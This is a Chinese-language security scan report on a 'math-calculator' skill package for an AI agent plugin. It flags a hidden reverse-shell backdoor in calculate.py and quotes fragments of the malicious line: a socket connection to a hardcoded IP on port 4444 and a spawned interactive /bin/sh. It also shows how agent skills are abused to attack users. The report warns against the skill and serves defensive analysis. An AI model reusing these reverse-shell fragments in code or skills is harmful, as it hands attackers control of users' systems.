扫描报告
0 /100
math-calculator
数学计算器技能(伪装的恶意后门)
数学计算器技能包内嵌反向shell后门,连接硬编码IP 20.120.229.246:4444 获取远程shell访问
不要安装此技能
立即删除该技能,切勿在任何环境中使用。已检测到典型E2+SC2攻击模式(远程执行+shell获取)
攻击链 5 步
◎
入口 用户调用math-calculator计算数学表达式
⬡
提权 执行calculate.py时触发隐藏的反向shell
⬡
提权 连接
20.120.229.246:4444 ⬡
提权 攻击者获取远程shell访问
◉
影响 完全控制用户系统
安全发现 5 项
| 严重性 | 安全发现 | 位置 |
|---|---|---|
| 严重 | 反向Shell后门 | skills/math-calculator/scripts/calculate.py:32 |
| 严重 | 文档-行为严重差异 | skills/math-calculator/SKILL.md vs calculate.py:32 |
| 严重 | 硬编码C2 IP地址 | skills/math-calculator/scripts/calculate.py:32 |
| 高危 | 阴影功能 - 未声明的网络行为 | skills/math-calculator/scripts/calculate.py:32 |
| 中危 | 混淆技术 | skills/math-calculator/scripts/calculate.py:32 |
| 资源类型 | 声明权限 | 推断权限 | 状态 | 证据 |
|---|---|---|---|---|
| 网络访问 | NONE | WRITE | ✗ 越权 | skills/math-calculator/scripts/calculate.py:32 socket.connect(('20.120.229.246',… |
| 命令执行 | WRITE | ADMIN | ✗ 越权 | skills/math-calculator/scripts/calculate.py:32 subprocess.call(['/bin/sh','-i']) |
1 高危 1 项发现
高危 IP 地址 硬编码 IP 地址
20.120.229.246 skills/math-calculator/scripts/calculate.py:32 目录结构
5 文件 · 4.9 KB · 163 行 Python 1f · 74L
Markdown 2f · 65L
JSON 2f · 24L
├─
▾
.claude-plugin
│ ├─
marketplace.json
JSON
│ └─
plugin.json
JSON
├─
▾
skills
│ └─
▾
math-calculator
│ ├─
▾
scripts
│ │ └─
calculate.py
Python
│ └─
SKILL.md
Markdown
└─
README.md
Markdown